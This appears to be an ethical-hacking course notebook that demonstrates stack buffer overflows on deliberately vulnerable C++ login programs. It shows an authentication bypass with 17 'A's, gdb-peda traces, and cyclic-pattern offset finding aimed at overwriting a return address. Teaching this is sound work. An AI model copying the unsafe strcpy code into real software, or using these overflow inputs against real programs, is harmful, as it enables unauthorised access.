## Stack Overflow - Execution Flow Corruption
- overrun in stack segment may lead to corruption in execution flow of the program
- violates the integrity of the program itself

## simple execution flow corruption demo
- stack overflow may lead to memory corruption which may lead to the corruption of execution flow
- let's use into auth_overflow.cpp program to demostrate a simple execution flow corruption

In [4]:
! cat ./demos/auth_overflow.cpp

#include <cstring>
#include <iostream>

using namespace std;

int check_authentication(char *password) {
    int auth_flag = 0;
    char password_buffer[16];

    strcpy(password_buffer, password);

    if(strcmp(password_buffer, "brillig") == 0)
        auth_flag = 1;
    if(strcmp(password_buffer, "outgrabe") == 0)
        auth_flag = 1;

    return auth_flag;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        cout << "Usage: " << argv[0] << " password\n";
        exit(0);
    }
    if(check_authentication(argv[1])) {
        cout << "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
        cout << "      Access Granted.\n";
        cout << "-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
    } 
    else
        cout << "\nAccess Denied.\n";
    return 0;
}
	


In [7]:
# let's compile auth_overflow.cpp
! echo kali | sudo -S ./compile.sh ./demos/auth_overflow.cpp auth_overflow.exe

[sudo] password for kali: 

In [8]:
# run the program; gives help on how to run it properly
! ./auth_overflow.exe

Usage: ./auth_overflow.exe password


In [9]:
# authenticate with password, outgrabe
! ./auth_overflow.exe outgrabe


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [10]:
# authenticate with password, brillig
! ./auth_overflow.exe brillig


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [11]:
# any other password shouldn't work!
! ./auth_overflow.exe letmein


Access Denied.


### Guess the password

In [13]:
# since password_buffer is 16 bytes, let's provide 16 As as password
! ./auth_overflow.exe $(python -c 'print("A"*16)')


Access Denied.


In [14]:
# how about 17 As?
! ./auth_overflow.exe $(python -c 'print("A"*17)')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### TODO
- draw stack of check_authentication( ) and explain why 17As let's you in!

### examine progam's stack

- we use gdb-peda to examine the running program's or live process's stack memory
- peda must be insalled to see the output similar to in this notebook
- run the program in GDB to see the address of auth_flag relative to that of password_buffer
- peda will show address of both password_buffer and auth_flag in stack context
- observe the value of auth_flag; any int value otherthan 0 is treated as true!

- load the program in gdb
```bash
(base) kali@kali:~/projects/EthicalHacking-Notebooks$ gdb -q auth_overflow.exe
Reading symbols from auth_overflow.exe...
```

- set a breakpoint to pause the program

```bash
gdb-peda$ break check_authentication
Breakpoint 1 at 0x80491c4: file ./demos/auth_overflow.cpp, line 7.
```
- run the loaded program with an argument of 17As

```bash
gdb-peda$ run $(python -c 'print("A"*17)')
Starting program: /home/kali/projects/EthicalHacking-Notebooks/auth_overflow.exe $(python -c 'print("A"*17)')
[----------------------------------registers-----------------------------------]
EAX: 0xffffc6b7 ('A' <repeats 17 times>)
EBX: 0x804c000 --> 0x804bf04 --> 0x1 
ECX: 0xffffc380 --> 0x2 
EDX: 0xffffc3b4 --> 0x0 
ESI: 0xffffc380 --> 0x2 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0xffffc338 --> 0xffffc368 --> 0x0 
ESP: 0xffffc310 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:      push   ebp)
EIP: 0x80491c4 (<_Z20check_authenticationPc+18>:        mov    DWORD PTR [ebp-0xc],0x0)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491b6 <_Z20check_authenticationPc+4>:    sub    esp,0x24
   0x80491b9 <_Z20check_authenticationPc+7>:    call   0x80490f0 <__x86.get_pc_thunk.bx>
   0x80491be <_Z20check_authenticationPc+12>:   add    ebx,0x2e42
=> 0x80491c4 <_Z20check_authenticationPc+18>:   mov    DWORD PTR [ebp-0xc],0x0
   0x80491cb <_Z20check_authenticationPc+25>:   sub    esp,0x8
   0x80491ce <_Z20check_authenticationPc+28>:   push   DWORD PTR [ebp+0x8]
   0x80491d1 <_Z20check_authenticationPc+31>:   lea    eax,[ebp-0x1c]
   0x80491d4 <_Z20check_authenticationPc+34>:   push   eax
[------------------------------------stack-------------------------------------]
0000| 0xffffc310 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:     push   ebp)
0004| 0xffffc314 --> 0x804c031 --> 0x0 
0008| 0xffffc318 --> 0x804c02c --> 0x0 
0012| 0xffffc31c --> 0x8049333 (<__static_initialization_and_destruction_0(int, int)+12>:       add    ebx,0x2ccd)
0016| 0xffffc320 --> 0x0 
0020| 0xffffc324 --> 0x2                                                                                 
0024| 0xffffc328 --> 0xffffc348 --> 0x804c000 --> 0x804bf04 --> 0x1                                        
0028| 0xffffc32c --> 0x804939f (<_GLOBAL__sub_I__Z20check_authenticationPc()+31>:       add    esp,0x10)  
[------------------------------------------------------------------------------]                             
Legend: code, data, rodata, value

Breakpoint 1, check_authentication (password=0xffffc6b7 'A' <repeats 17 times>)
    at ./demos/auth_overflow.cpp:7
7           int auth_flag = 0;
```

- step though the program one statement at a time and stop after strcpy function is exectued

```bash
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffc31c ('A' <repeats 17 times>)
EBX: 0x804c000 --> 0x804bf04 --> 0x1 
ECX: 0xffffc6c0 ("AAAAAAAA")
EDX: 0xffffc325 ("AAAAAAAA")
ESI: 0xffffc380 --> 0x2 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0xffffc338 --> 0xffffc368 --> 0x0 
ESP: 0xffffc310 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:      push   ebp)
EIP: 0x80491dd (<_Z20check_authenticationPc+43>:        sub    esp,0x8)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491d4 <_Z20check_authenticationPc+34>:   push   eax
   0x80491d5 <_Z20check_authenticationPc+35>:   call   0x8049090 <strcpy@plt>
   0x80491da <_Z20check_authenticationPc+40>:   add    esp,0x10
=> 0x80491dd <_Z20check_authenticationPc+43>:   sub    esp,0x8
   0x80491e0 <_Z20check_authenticationPc+46>:   lea    eax,[ebx-0x1ff7]
   0x80491e6 <_Z20check_authenticationPc+52>:   push   eax
   0x80491e7 <_Z20check_authenticationPc+53>:   lea    eax,[ebp-0x1c]
   0x80491ea <_Z20check_authenticationPc+56>:   push   eax
[------------------------------------stack-------------------------------------]
0000| 0xffffc310 --> 0xf7e81ae0 (<_ZNSt8ios_base4InitD2Ev>:     push   ebp)
0004| 0xffffc314 --> 0x804c031 --> 0x0 
0008| 0xffffc318 --> 0x804c02c --> 0x0 
0012| 0xffffc31c ('A' <repeats 17 times>)
0016| 0xffffc320 ('A' <repeats 13 times>)
0020| 0xffffc324 ("AAAAAAAAA")
0024| 0xffffc328 ("AAAAA")
0028| 0xffffc32c --> 0x41 ('A')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
12          if(strcmp(password_buffer, "brillig") == 0)

```

- once the password is copied to local stack variable password_buffer, print the content of the password_buffer

```bash
gdb-peda$ p password_buffer 
$1 = 'A' <repeats 16 times>
```

- let's see the content of auth_flag

```bash
db-peda$ p auth_flag
$2 = 0x41

gdb-peda$ p/d auth_flag
$5 = 65
```

- let's look at the addresses of password_buffer and auth_flag

```bash
gdb-peda$ p &password_buffer 
$8 = (char (*)[16]) 0xffffc31c

gdb-peda$ p &auth_flag 
$12 = (int *) 0xffffc32c

```

- gdb shows that password_buffer's address is lower than the auth_flag's address
- let's subtract the address of auth_flag from address of password buffer (using Python), it should be a -nve difference

In [15]:
print(0xffffc31c - 0xffffc32c)

-16


### variables declaration order changed
- can you overflow if the variable declaration orders are switched?
- normally, variables are pushed on the stack as they're loaded from top to bottom
    - the last variable decalred will be pushed last on the top of the stack
    
### TODO
- compile and examine demos/auth_overflow2.cpp
- draw stack
- verify it using GDB

In [16]:
# let's see the source code of demos/auth_overflow2.c
! cat demos/auth_overflow2.cpp

#include <cstring>
#include <iostream>

using namespace std;

bool check_authentication(char *password) {
    char password_buffer[16];
    bool auth_flag = 0;

    strcpy(password_buffer, password);

    if(strcmp(password_buffer, "brillig") == 0)
        auth_flag = 1;
    if(strcmp(password_buffer, "outgrabe") == 0)
        auth_flag = 1;

    return auth_flag;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        cout << "Usage: " << argv[0] << " password\n";
        exit(0);
    }
    if(check_authentication(argv[1])) {
        cout << "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
        cout << "      Access Granted.\n";
        cout << "-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
    } 
    else
        cout << "\nAccess Denied.\n";
    return 0;
}
	


In [17]:
# let's compile the program
! ./compile.sh ./demos/auth_overflow2.cpp auth_overflow2.exe

In [18]:
# run the program with 17As
! ./auth_overflow2.exe $(python3 -c 'print("A"*17, end="")')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### well, how is it possible?
- see in gdb where auth_flag is compared to password_buffer
- turns out auth_flag is still at higher address (pushed before) compared to password_buffer
- compiler optimization is a plausible answer
- if auth_flag is in lower address compared to password_buffer, you can't overwrite it by oveflowing password_buffer

## Execution flow with function call
- when a caller calls a function, program execution enters the function and exectues each line of code inside function
- callee function must return back the execution to its caller
- caller pushes return address to the calee's stack, so the calle knows where to return to and continue execution in caller

### overwrite the caller's return address
- what if the buffer is overflown to corrupt the caller's return address with something else?
- if the return address is not valid, program will segfault
- if the return address is a valid one, program will execute the code in that controlled return address!

### could return to "    access granted     " line!
- find the address add esp, 0x10 before the addres to "access granted"
- overflow the buffer and and overwrite the return address with the address that prints "access granted"
- overflow the return address to bypass check_authentication() condition in main and directly execute the true block
- possible in older gcc/assembly version (Hacking LiveCD)
- couldn't get it to work on newer system (tested on Kali!
- let's assemble and look at the return instruction...
- repeated instructions: add esp, 0x10 and sub esp, 0xc etc. makes it hard to jump into the right instruction

### return to the function/code of user's choice
- this technique is fairly straigtforward and just works!
- find the address of the function of your choice in the program and overwrite the caller's return address to the controlled function's address
- let's look at auth_overflow3.cpp program

In [19]:
! cat ./demos/auth_overflow3.cpp

#include <cstring>
#include <iostream>

using namespace std;

void valid() {
    cout << "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
    cout << "      Access Granted.\n";
    cout << "-=-=-=-=-=-=-=-=-=-=-=-=-=-\n";
}

void invalid() {
    cout << "\nAccess Denied.\n";
    cout << "Try again...\n";
}

int check_authentication(char *password) {
    char password_buffer[16];

    strcpy(password_buffer, password);

    if(strcmp(password_buffer, "brillig") == 0)
        return true;
    if(strcmp(password_buffer, "outgrabe") == 0)
        return true;

    return false;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        cout << "Usage: " << argv[0] << " password\n";
        exit(0);
    }
    if(check_authentication(argv[1]))
        valid();
    else
        invalid();
        
    return 0;
}

In [20]:
! echo kali | sudo -S ./compile.sh ./demos/auth_overflow3.cpp auth_overflow3.exe

[sudo] password for kali: 

In [21]:
! ./auth_overflow3.exe $(python -c 'print("A"*17)')
# no auth_flag to overflow!


Access Denied.
Try again...


In [22]:
! ./auth_overflow3.exe $(python -c 'print("A"*100)')
# segfault! see on terminal

```bash
(base) kali@kali:~/projects/Hacking-CPP-Notebooks$ ./auth_overflow3.exe $(python -c 'print("A"*100)')
Segmentation fault
```

## Program execution and return address

- let's load the program in gdb to examine memory address, esp. the caller's return address

```bash
(base) kali@kali:~/projects/Hacking-CPP-Notebooks$ gdb -q auth_overflow3.exe
Reading symbols from auth_overflow3.exe...
```

- let's set two breakpoints one at main and the other at check_authentication function

```bash
gdb-peda$ break main
Breakpoint 1 at 0x80492ef: file auth_overflow3.cpp, line 31.

gdb-peda$ break check_authentication
Breakpoint 2 at 0x8049271: file auth_overflow3.cpp, line 20.
```
- let's run the program with 100 junk bytes (100As will do it!)
- junk must be large enough to overwrite the return address
- typically big enough to overwrite the buffer and the local variables if they're pushed -below the buffer + 8 bytes
- 100 bytes should be more than enough to overflow 16 bytes password buffer and the return address

```bash
gdb-peda$ run $(python -c 'print("A"*100)')

Starting program: /home/kali/projects/Hacking-CPP-Notebooks/auth_overflow3.exe $(python -c 'print("A"*100)')
[----------------------------------registers-----------------------------------]
EAX: 0xf7de8ae8 --> 0xffffc400 --> 0xffffc6ed ("SHELL=/bin/bash")
EBX: 0x804c000 --> 0x804bf04 --> 0x1 
ECX: 0xffffc350 --> 0x2 
EDX: 0xffffc384 --> 0x0 
ESI: 0xffffc350 --> 0x2 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0xffffc338 --> 0x0 
ESP: 0xffffc320 --> 0x2 
EIP: 0x80492ef (<main(int, char**)+32>: cmp    DWORD PTR [esi],0x1)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80492e2 <main(int, char**)+19>:    call   0x80490f0 <__x86.get_pc_thunk.bx>
   0x80492e7 <main(int, char**)+24>:    add    ebx,0x2d19
   0x80492ed <main(int, char**)+30>:    mov    esi,ecx
=> 0x80492ef <main(int, char**)+32>:    cmp    DWORD PTR [esi],0x1
   0x80492f2 <main(int, char**)+35>:    jg     0x804933c <main(int, char**)+109>
   0x80492f4 <main(int, char**)+37>:    sub    esp,0x8
   0x80492f7 <main(int, char**)+40>:    lea    eax,[ebx-0x1f75]
   0x80492fd <main(int, char**)+46>:    push   eax
[------------------------------------stack-------------------------------------]
0000| 0xffffc320 --> 0x2 
0004| 0xffffc324 --> 0xffffc3f4 --> 0xffffc64b ("/home/kali/projects/Hacking-CPP-Notebooks/auth_overflow3.exe")
0008| 0xffffc328 --> 0xffffc400 --> 0xffffc6ed ("SHELL=/bin/bash")
0012| 0xffffc32c --> 0xffffc350 --> 0x2 
0016| 0xffffc330 --> 0x0 
0020| 0xffffc334 --> 0xf7de6000 --> 0x1e4d6c 
0024| 0xffffc338 --> 0x0 
0028| 0xffffc33c --> 0xf7c1fdf6 (<__libc_start_main+262>:       add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, main (argc=0x2, argv=0xffffc3f4) at auth_overflow3.cpp:31
31          if(argc < 2) {
```
- enter next or n for short to execute next instruction; keep entering next and stop when the instruction: **strcpy(password_buffer, password);** is exectued
- the password passed to the function will have been copied to **password_buffer** local variable

```bash
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xf7de8ae8 --> 0xffffc400 --> 0xffffc6ed ("SHELL=/bin/bash")
EBX: 0x804c000 --> 0x804bf04 --> 0x1 
ECX: 0xffffc350 --> 0x2 
EDX: 0xffffc384 --> 0x0 
ESI: 0xffffc350 --> 0x2 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0xffffc338 --> 0x0 
ESP: 0xffffc320 --> 0x2 
EIP: 0x804933c (<main(int, char**)+109>:        mov    eax,DWORD PTR [esi+0x4])
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8049332 <main(int, char**)+99>:    sub    esp,0xc
   0x8049335 <main(int, char**)+102>:   push   0x0
   0x8049337 <main(int, char**)+104>:   call   0x8049070 <exit@plt>
=> 0x804933c <main(int, char**)+109>:   mov    eax,DWORD PTR [esi+0x4]
   0x804933f <main(int, char**)+112>:   add    eax,0x4
   0x8049342 <main(int, char**)+115>:   mov    eax,DWORD PTR [eax]
   0x8049344 <main(int, char**)+117>:   sub    esp,0xc
   0x8049347 <main(int, char**)+120>:   push   eax
[------------------------------------stack-------------------------------------]
0000| 0xffffc320 --> 0x2 
0004| 0xffffc324 --> 0xffffc3f4 --> 0xffffc64b ("/home/kali/projects/Hacking-CPP-Notebooks/auth_overflow3.exe")
0008| 0xffffc328 --> 0xffffc400 --> 0xffffc6ed ("SHELL=/bin/bash")
0012| 0xffffc32c --> 0xffffc350 --> 0x2 
0016| 0xffffc330 --> 0x0 
0020| 0xffffc334 --> 0xf7de6000 --> 0x1e4d6c 
0024| 0xffffc338 --> 0x0 
0028| 0xffffc33c --> 0xf7c1fdf6 (<__libc_start_main+262>:       add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
35          if(check_authentication(argv[1]))
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffc688 ('A' <repeats 100 times>)
EBX: 0x804c000 --> 0x804bf04 --> 0x1 
ECX: 0xffffc350 --> 0x2 
EDX: 0xffffc384 --> 0x0 
ESI: 0xffffc350 --> 0x2 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0xffffc308 --> 0xffffc338 --> 0x0 
ESP: 0xffffc2f0 --> 0x0 
EIP: 0x8049271 (<_Z20check_authenticationPc+18>:        sub    esp,0x8)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8049263 <_Z20check_authenticationPc+4>:    sub    esp,0x14
   0x8049266 <_Z20check_authenticationPc+7>:    call   0x80490f0 <__x86.get_pc_thunk.bx>
   0x804926b <_Z20check_authenticationPc+12>:   add    ebx,0x2d95
=> 0x8049271 <_Z20check_authenticationPc+18>:   sub    esp,0x8
   0x8049274 <_Z20check_authenticationPc+21>:   push   DWORD PTR [ebp+0x8]
   0x8049277 <_Z20check_authenticationPc+24>:   lea    eax,[ebp-0x18]
   0x804927a <_Z20check_authenticationPc+27>:   push   eax
   0x804927b <_Z20check_authenticationPc+28>:   call   0x8049090 <strcpy@plt>
[------------------------------------stack-------------------------------------]
0000| 0xffffc2f0 --> 0x0 
0004| 0xffffc2f4 --> 0x2 
0008| 0xffffc2f8 --> 0xffffc318 --> 0x804c000 --> 0x804bf04 --> 0x1 
0012| 0xffffc2fc --> 0x80493ed (<_GLOBAL__sub_I__Z5validv()+31>:        add    esp,0x10)
0016| 0xffffc300 --> 0x1 
0020| 0xffffc304 --> 0x804c000 --> 0x804bf04 --> 0x1 
0024| 0xffffc308 --> 0xffffc338 --> 0x0 
0028| 0xffffc30c --> 0x804934d (<main(int, char**)+126>:        add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, check_authentication (password=0xffffc688 'A' <repeats 100 times>) at auth_overflow3.cpp:20
20          strcpy(password_buffer, password);
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffc2f0 ('A' <repeats 100 times>)
EBX: 0x804c000 --> 0x804bf04 --> 0x1 
ECX: 0xffffc6e0 ('A' <repeats 12 times>)
EDX: 0xffffc348 ('A' <repeats 12 times>)
ESI: 0xffffc350 ("AAAA")
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0xffffc308 ('A' <repeats 76 times>)
ESP: 0xffffc2f0 ('A' <repeats 100 times>)
EIP: 0x8049283 (<_Z20check_authenticationPc+36>:        sub    esp,0x8)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804927a <_Z20check_authenticationPc+27>:   push   eax
   0x804927b <_Z20check_authenticationPc+28>:   call   0x8049090 <strcpy@plt>
   0x8049280 <_Z20check_authenticationPc+33>:   add    esp,0x10
=> 0x8049283 <_Z20check_authenticationPc+36>:   sub    esp,0x8
   0x8049286 <_Z20check_authenticationPc+39>:   lea    eax,[ebx-0x1f86]
   0x804928c <_Z20check_authenticationPc+45>:   push   eax
   0x804928d <_Z20check_authenticationPc+46>:   lea    eax,[ebp-0x18]
   0x8049290 <_Z20check_authenticationPc+49>:   push   eax
[------------------------------------stack-------------------------------------]
0000| 0xffffc2f0 ('A' <repeats 100 times>)
0004| 0xffffc2f4 ('A' <repeats 96 times>)
0008| 0xffffc2f8 ('A' <repeats 92 times>)
0012| 0xffffc2fc ('A' <repeats 88 times>)
0016| 0xffffc300 ('A' <repeats 84 times>)
0020| 0xffffc304 ('A' <repeats 80 times>)
0024| 0xffffc308 ('A' <repeats 76 times>)
0028| 0xffffc30c ('A' <repeats 72 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
22          if(strcmp(password_buffer, "brillig") == 0)
```

- return address is always stored at EBP+4, so let's see that location

```bash
gdb-peda$ p $ebp+4
$1 = (void *) 0xffffc30c
```

- now the 100As are copied to the password_buffer, let's examine 40 word bytes from top of the stack
- 40w = 160 bytes that should display the location of caller's return address!
- notice a bunch of Ox41 = A that are stored in stack

```bash
gdb-peda$ x/40wx $esp
0xffffc2f0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffc300:     0x41414141      0x41414141      0x41414141      0x41414141 <- return address & 0xffffc30c
0xffffc310:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffc320:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffc330:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffc340:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffc350:     0x41414141      0xffffc300      0xffffc400      0xffffc384
0xffffc360:     0xffffc394      0xf7ffdb40      0xf7fcbd10      0xf7de6000
0xffffc370:     0x00000001      0x00000000      0xffffc3d8      0x00000000
0xffffc380:     0xf7ffd000      0x00000000      0xf7de6000      0xf7de6000
```
- let's continue to the end of the program

```bash
gdb-peda$ c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x41414141 ('AAAA')
ECX: 0x6f ('o')
EDX: 0xffffc2f0 ('A' <repeats 100 times>)
ESI: 0xffffc350 ("AAAA")
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0x41414141 ('AAAA')
ESP: 0xffffc310 ('A' <repeats 68 times>)
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffc310 ('A' <repeats 68 times>)
0004| 0xffffc314 ('A' <repeats 64 times>)
0008| 0xffffc318 ('A' <repeats 60 times>)
0012| 0xffffc31c ('A' <repeats 56 times>)
0016| 0xffffc320 ('A' <repeats 52 times>)
0020| 0xffffc324 ('A' <repeats 48 times>)
0024| 0xffffc328 ('A' <repeats 44 times>)
0028| 0xffffc32c ('A' <repeats 40 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? () <--------------------- 0x41414141 == AAAA
```

- since the caller's return address (0xffffc30c) is overwritten with AAAA, program crashes with segfault

### Finding the offset

- knowing the offset will help us overwrite the caller's return address with our controlled return address
- let's use gdb-peda for this!

```bash
(base) kali@kali:~/projects/Hacking-CPP-Notebooks$ gdb -q auth_overflow3.exe
Reading symbols from auth_overflow3.exe...
```
- create cyclic pattern of 100 bytes
- pattern should be large enought to overwrite the return address and crash the program

```bash
gdb-peda$ pattern create 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
```

- let's create and store the pattern as argument to the program

```bash
gdb-peda$ pattern arg 100
Set 1 arguments to program
```

- let's run the program with the cyclic pattern as argumen

```bash
gdb-peda$ run
Starting program: /home/kali/projects/Hacking-CPP-Notebooks/auth_overflow3.exe 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0                                                                               
EBX: 0x41412d41 ('A-AA')
ECX: 0x6f ('o')
EDX: 0xffffc2f0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
ESI: 0xffffc350 ("6AAL")
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0x44414128 ('(AAD')
ESP: 0xffffc310 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
EIP: 0x413b4141 ('AA;A')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x413b4141
[------------------------------------stack-------------------------------------]
0000| 0xffffc310 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0004| 0xffffc314 ("EAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0xffffc318 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0012| 0xffffc31c ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0xffffc320 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0020| 0xffffc324 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0xffffc328 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0028| 0xffffc32c ("2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x413b4141 in ?? ()
```

- program crashed!
- let's search the pattern for offset

```bash
gdb-peda$ patts  # pattern search
Registers contain pattern buffer:
EBX+0 found at offset: 20
EBP+0 found at offset: 24
EIP+0 found at offset: 28 <--------- this is the offset!
Registers point to pattern buffer:
[EDX] --> offset 0 - size ~100
[ESP] --> offset 32 - size ~68
[ESI] --> offset 96 - size ~4
Pattern buffer found at:
0xf7c000cd : offset 33208 - size    4 (/usr/lib32/libm-2.31.so)
0xffffc2f0 : offset    0 - size  100 ($sp + -0x20 [-8 dwords])
0xffffc689 : offset    0 - size  100 ($sp + 0x379 [222 dwords])
References to pattern buffer found at:
0xf7e62d2c : 0xffffc2f0 (/usr/lib32/libstdc++.so.6.0.28)
0xffffc2d0 : 0xffffc2f0 ($sp + -0x40 [-16 dwords])
0xffffc2e0 : 0xffffc2f0 ($sp + -0x30 [-12 dwords])
0xffffc3f8 : 0xffffc689 ($sp + 0xe8 [58 dwords])
```

- let's run the program in gdb with 28As+BBBB

```bash
gdb-peda$ run $(python -c 'print("A"*28+"BBBB")')
Starting program: /home/kali/projects/Hacking-CPP-Notebooks/auth_overflow3.exe $(python -c 'print("A"*28+"BBBB")')

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x41414141 ('AAAA')
ECX: 0x6f ('o')
EDX: 0xffffc340 ('A' <repeats 28 times>, "BBBB")
ESI: 0xffffc3a0 --> 0x2 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0x41414141 ('AAAA')
ESP: 0xffffc360 --> 0xffffc600 --> 0x4 
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffc360 --> 0xffffc600 --> 0x4 
0004| 0xffffc364 --> 0xffffffff 
0008| 0xffffc368 --> 0x804c000 --> 0x804bf04 --> 0x1 
0012| 0xffffc36c --> 0x80492e7 (<main(int, char**)+24>: add    ebx,0x2d19)
0016| 0xffffc370 --> 0x2 
0020| 0xffffc374 --> 0xffffc444 --> 0xffffc690 ("/home/kali/projects/Hacking-CPP-Notebooks/auth_overflow3.exe")
0024| 0xffffc378 --> 0xffffc450 --> 0xffffc6ee ("SHELL=/bin/bash")
0028| 0xffffc37c --> 0xffffc3a0 --> 0x2 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? () <-------- BBBB
```
- so we've determined that 2 bytes of junk will get us to the location where caller's return address is stored
- now instead of overwriting the return address with BBBB, how about we find some interesting function's address!
- use **nm** to find the addresses of all the symbols

In [18]:
! nm auth_overflow3.exe

0804c030 B __bss_start
0804c030 b completed.0
         U __cxa_atexit@@GLIBC_2.1.3
0804c028 D __data_start
0804c028 W data_start
08049100 t deregister_tm_clones
080490e0 T _dl_relocate_static_pie
08049180 t __do_global_dtors_aux
0804bf00 d __do_global_dtors_aux_fini_array_entry
0804c02c D __dso_handle
0804bf04 d _DYNAMIC
0804c030 D _edata
0804c034 B _end
         U exit@@GLIBC_2.0
08049468 T _fini
0804a000 R _fp_hw
080491b0 t frame_dummy
0804bef8 d __frame_dummy_init_array_entry
0804a304 r __FRAME_END__
0804c000 d _GLOBAL_OFFSET_TABLE_
080493ce t _GLOBAL__sub_I__Z5validv
         w __gmon_start__
0804a0a0 r __GNU_EH_FRAME_HDR
08049000 T _init
0804bf00 d __init_array_end
0804bef8 d __init_array_start
0804a004 R _IO_stdin_used
08049460 T __libc_csu_fini
08049400 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
080492cf T main
08049140 t register_tm_clones
080490a0 T _start
         U strcmp@@GLIBC_2.0
         U strcpy@@GLIBC_2.0
